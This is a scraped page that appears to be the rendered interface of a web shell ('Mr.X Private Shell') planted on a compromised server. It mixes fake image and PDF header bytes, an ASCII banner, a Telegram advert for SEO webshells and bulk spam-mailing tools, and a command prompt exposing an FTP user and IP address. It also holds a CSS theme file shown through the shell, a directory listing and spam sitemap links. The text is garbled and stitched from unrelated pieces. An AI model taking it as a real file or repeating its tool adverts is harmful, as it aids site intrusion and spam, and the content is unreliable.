xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
@-webkit-keyframes ngdialog-flyin {
    0% {
        opacity: 0;
        -webkit-transform: translateY(-40px);
        transform: translateY(-40px);
    }

    100% {
        opacity: 1;
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@keyframes ngdialog-flyin {
    0% {
        opacity: 0;
        -webkit-transform: translateY(-40px);
        transform: translateY(-40px);
    }

    100% {
        opacity: 1;
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }
}

@-webkit-keyframes ngdialog-flyout {
    0% {
        opacity: 1;
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }

    100% {
        opacity: 0;
        -webkit-transform: translateY(-40px);
        transform: translateY(-40px);
    }
}

@keyframes ngdialog-flyout {
    0% {
        opacity: 1;
        -webkit-transform: translateY(0);
        transform: translateY(0);
    }

    100% {
        opacity: 0;
        -webkit-transform: translateY(-40px);
        transform: translateY(-40px);
    }
}

.ngdialog.ngdialog-theme-default {
    padding-bottom: 160px;
    padding-top: 140px;
}

.ngdialog.ngdialog-theme-default.ngdialog-closing .ngdialog-content {
    -webkit-animation: ngdialog-flyout .5s;
    animation: ngdialog-flyout .5s;
}

.ngdialog.ngdialog-theme-default .ngdialog-content {
    -webkit-animation: ngdialog-flyin .5s;
    animation: ngdialog-flyin .5s;
    background: #fcfcfc;
  /* border-radius: 5px; */
    color: #444;
    font-family: 'Open Sans', sans-serif;
  /*font-size: 1.1em;*/
    line-height: 1.5em;
    margin: 0 auto;
  /* max-width: 100%; */
  /* padding: 1em; */
    position: relative;
    width: 650px;
    box-shadow: 1px 1px 10px rgba(0, 0, 0, 0.2);
}

.ngdialog.ngdialog-theme-default .ngdialog-content label {
	font-weight: bold;
	line-height: 18px;
	font-size: 13px;
}

.ngdialog.ngdialog-theme-default .ngdialog-content label.checkbox {
    font-weight: normal;
    margin-left: 5px;
    vertical-align: middle;
}

.ngdialog.ngdialog-theme-default .ngdialog-close {
    border-radius: 5px;
    cursor: pointer;
    position: absolute;
    right: 0;
    top: 0;
}

.ngdialog.ngdialog-theme-default .ngdialog-close:before {
    background: transparent;
    border-radius: 3px;
    color: #bbb;
    content: '\00D7';
    font-size: 26px;
    font-weight: 400;
    height: 30px;
    line-height: 26px;
    position: absolute;
    right: 3px;
    text-align: center;
    top: 3px;
    width: 30px;
}

.ngdialog.ngdialog-theme-blue .ngdialog-close:before {
    background: transparent;
    border-radius: 3px;
    color: #fff;
    content: '\00D7';
    font-size: 26px;
    font-weight: 400;
    height: 30px;
    line-height: 26px;
    position: absolute;
    right: 3px;
    text-align: center;
    top: 9px;
    width: 30px;
}
.ngdialog.ngdialog-theme-blue  .ngdialog.ngdialog-theme-default .ngdialog-close:hover:before, 
.ngdialog.ngdialog-theme-blue  .ngdialog.ngdialog-theme-default .ngdialog-close:active:before {
    color: rgba(255, 255, 255, 0.88);
}

.ngdialog .ui-grid-table-wrap {
    max-height: 350px;
    overflow-y: auto ;
}

.ngdialog.ngdialog-theme-default .ngdialog-close:hover:before,
.ngdialog.ngdialog-theme-default .ngdialog-close:active:before {
    color: #777;
}

.ngdialog.ngdialog-theme-default .ngdialog-message {
    margin-bottom: .5em;
}

.ngdialog.ngdialog-theme-default .ngdialog-input {
    margin-bottom: 1em;
}

.ngdialog.ngdialog-theme-default .ngdialog-input textarea,
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="text"],
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="password"],
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="email"],
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="url"] {
    background: #fff;
    border: 0;
    border-radius: 3px;
    font-family: inherit;
    font-size: inherit;
    font-weight: inherit;
    margin: 0 0 .25em;
    min-height: 2.5em;
    padding: .25em .67em;
    width: 100%;
}

.ngdialog.ngdialog-theme-default .ngdialog-input textarea:focus,
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="text"]:focus,
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="password"]:focus,
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="email"]:focus,
.ngdialog.ngdialog-theme-default .ngdialog-input input[type="url"]:focus {
    box-shadow: inset 0 0 0 2px #8dbdf1;
    outline: none;
}

.ngdialog.ngdialog-theme-default .ngdialog-buttons {
    *zoom: 1;
}

.ngdialog.ngdialog-theme-default .ngdialog-buttons:after {
    content: '';
    display: table;
    clear: both;
}

.ngdialog.ngdialog-theme-default .ngdialog-button {
    border: 0;
    border-radius: 3px;
    cursor: pointer;
    float: right;
    font-family: inherit;
    font-size: .8em;
    letter-spacing: .1em;
    line-height: 1em;
    margin: 0 0 0 .5em;
    padding: .75em 2em;
    text-transform: uppercase;
}

.ngdialog.ngdialog-theme-default .ngdialog-button:focus {
    -webkit-animation: ngdialog-pulse 1.1s infinite;
    animation: ngdialog-pulse 1.1s infinite;
    outline: none;
}

@media (max-width: 568px) {
    .ngdialog.ngdialog-theme-default .ngdialog-button:focus {
        -webkit-animation: none;
        animation: none;
    }
}

.ngdialog.ngdialog-theme-default .ngdialog-button.ngdialog-button-primary {
    background: #3288e6;
    color: #fff;
}

.ngdialog.ngdialog-theme-default .ngdialog-button.ngdialog-button-secondary {
    background: #e0e0e0;
    color: #777;
}


/* ZEND */
.ngdialog.ngdialog-theme-plain.custom-width .ngdialog-content {
    width: 150px;
}

.ngdialog-overlay {
    background-color: #000000;
    background-position: center center;
    background-repeat: no-repeat;
    background: -webkit-gradient(radial, center center, 0, center center, 460, from(#ffffff), to(#291a49));
    background: -webkit-radial-gradient(circle, #ffffff, #291a49);
    opacity: 0.6;
}

@-webkit-keyframes ngdialog-fadeout-overlay {
    0% {
        opacity: 0.6;
    }

    100% {
        opacity: 0;
    }
}

@keyframes ngdialog-fadeout-overlay {
    0% {
        opacity: 0.6;
    }

    100% {
        opacity: 0;
    }
}

@-webkit-keyframes ngdialog-fadein-overlay {
    0% {
        opacity: 0;
    }

    100% {
        opacity: 0.6;
    }
}

@keyframes ngdialog-fadein-overlay {
    0% {
        opacity: 0;
    }

    100% {
        opacity: 0.6;
    }
}

.ngdialog footer .buttons-right {
    float: right;
    /* height: 40px; */
    /* clear: both; */
}

/* Content Styling */
.ngdialog footer {
    background: #2774A0;
    padding: 7px;
}

.ngdialog-content .form-invalid-warning {
    color: #BF0000;
    font-style: italic;
    display: block;
}

body[disable-ngdialog-close="true"] .ngdialog-close {
    display: none;
}

.ngdialog.ngdialog-theme-default.ngdialog-videbox .ngdialog-content {
    width: 600px;
}

.ngdialog.ngdialog-theme-default.ngdialog-plugin-modal .ngdialog-content {
    width: 770px;
    max-width: 770px;
    
}

.ngdialog.ngdialog-theme-default.ngdialog-wizard .ngdialog-content {
    width: 815px;
 /* as today */
    box-sizing: content-box;
}

.ngdialog.ngdialog-theme-default.ngdialog-wizard .ngdialog-content #authentication-settings-box,
.ngdialog.ngdialog-theme-default.ngdialog-wizard .ngdialog-content #deploymentWizard,
.ngdialog.ngdialog-theme-default.ngdialog-wizard .ngdialog-content #selective-access-box {
        height: 452px;
	overflow: hidden;
	width: 860px;
}
.ssl-error-text{
    float: right;
    width: 95%;
}
.ssl-error-icon{
    float: left;
    width: 5%;
    margin-top: 3px;
}
.vhost-validation-error-ssl{
    display: block;
    overflow: hidden;
    padding-left: 0px !important;
}
.vhost-validation-error-ssl{
}
#vhost-ssl-continue-checkbox-label{
    float: right;
    width: 94%;
}
.ngdialog.ngdialog-theme-default.ngdialog-wizard .ngdialog-content #authentication-settings-box .wizard-help-icon,
.ngdialog.ngdialog-theme-default.ngdialog-wizard .ngdialog-content #deploymentWizard .wizard-help-icon,
.ngdialog.ngdialog-theme-default.ngdialog-wizard .ngdialog-content #selective-access-box .wizard-help-icon {
	right: 0;
}

.ngdialog.ngdialog-theme-default.ngdialog-tiny .ngdialog-content {
    width: 300px;
}

.ngdialog.ngdialog-theme-default.ngdialog-small .ngdialog-content {
    width: 500px;
}

.ngdialog.ngdialog-theme-default .ngdialog-content .content-padded {
    padding: 10px 20px;
}

.ngdialog-content footer {
    /* min-height: 30px; */
}

.buttons-left {
    min-height: 22px;
    display: inline-block;
}

.ngdialog.ngdialog-theme-default.ngdialog-plugin-modal {
    padding-top: 60px;
}

.modal-loader {
    text-align: center;
    padding: 50px;
}

.ngdialog input:focus,
.ngdialog select:focus {
    box-shadow: 0px 0px 4px rgba(39, 116, 160, 0.5);
}

.wizard.wizard-page.vhost-wizard{
height: 460px !important;
}

.wizard.wizard-page.vhost-wizard .page-wrapper.vhost-properties {
  height: 440px;
  padding:0px;
}
.markdown-wrapper img{
    max-width: 100%;
}

Filemanager

Name Type Size Permission Actions
min Folder 0755
vendor Folder 0755
app.css File 450.3 KB 0644
ngDialog-theme-zend.css File 8.81 KB 0644
overrides.css File 2.95 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml